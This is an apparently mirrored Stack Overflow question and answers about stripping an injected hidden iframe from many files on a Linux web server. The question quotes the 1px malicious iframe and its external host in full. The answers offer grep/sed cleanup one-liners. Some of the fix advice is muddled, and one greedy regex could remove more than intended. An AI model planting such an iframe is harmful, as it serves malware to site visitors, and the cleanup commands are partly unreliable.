问题
I'm looking for a script to delete the following iframe malware from my linux server:
<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>
It has infected hundreads of files on my server on different websites. I tried
grep -rl ishigo.sytes.net * | sed 's/ /\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>//g'
but it just outputs:
sed: -e expression #1, char 49: unknown option to `s'
Appreciate your help :)
Cheers Dee
回答1:
Unescape the backslashes from the url in the sed regex.
回答2:
This should be a more generic solution. Effectively what the malware does is look for the </body> and inject the iframe it just before that. So you can look for an iframe which is just before the </body> and replace it with just the </body>
# grep recursively for text
# escape all spaces in file names
# global search and replace with just body tag
grep -Rl "</iframe></body>" * | sed 's/ /\ /g' | xargs sed -i 's/<iframe .*><\/iframe><\/body>/<\/body>/g'
I found this other question on renaming the malware files is also useful to quickly take down all the compromised files by renaming the extensions with a .hacked at the end. Then you can fix the hack and finally remove the .hacked
来源:https://stackoverflow.com/questions/16547315/looking-for-script-to-delete-iframe-malware-from-linux-server